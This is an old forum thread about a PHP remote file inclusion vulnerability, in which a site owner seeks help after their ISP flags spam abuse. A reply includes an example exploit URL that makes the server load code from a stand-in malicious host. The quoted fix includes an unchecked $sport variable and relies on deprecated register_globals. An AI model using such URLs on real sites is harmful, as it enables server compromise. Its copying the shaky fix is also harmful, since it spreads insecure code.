Posted by SA SA on 01/16/07 00:12

Sorry to be an ignorant but should not "P Pulkkinen" 's solution work?
Please advise if am overlooking something.

Hosting company i am using hosts should plug the hole but if the code
itself is buggy then i don't blame them.

<-------------

$allowable_sports= array("football", "rugby", "tennis");

if (isset($HTTP_GET_VARS['sport']) &&
in_array($HTTP_GET_VARS['sport'],
$allowable_sports) )
{ require ($sport.".php"); }
else
{ require ("error.php"); }

---------------->



Colin McKinnon wrote:
> SA SA wrote:
>
> > Hello,
> > I do not know anything about PHP but thrown into this mix. I was told
> > by my ISP that there is vulnerability in following code to allow
> > spammer load an offsite php script for mailing.
>
> There are 2 very odd things about this:
>
> 1) that you have an ISP who is willing to take the time to read your code
> (interesting, and a big plus)
>
> 2) that your host is not configured to prevent this (a bit worrying,
> depending on the reason for 1).
>
> To exploit this, someone just has to enter a URL like:
>
> http://www.sasas-site.com/code.php?sport=http%3A%2F%2Fwww.blackhat.net%2Fmalware.src
>
> to get there code into your ISPs webserver.
>
> > how od i fix it?
> >
>
> Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
> values.
>
> C.

[Back to original message]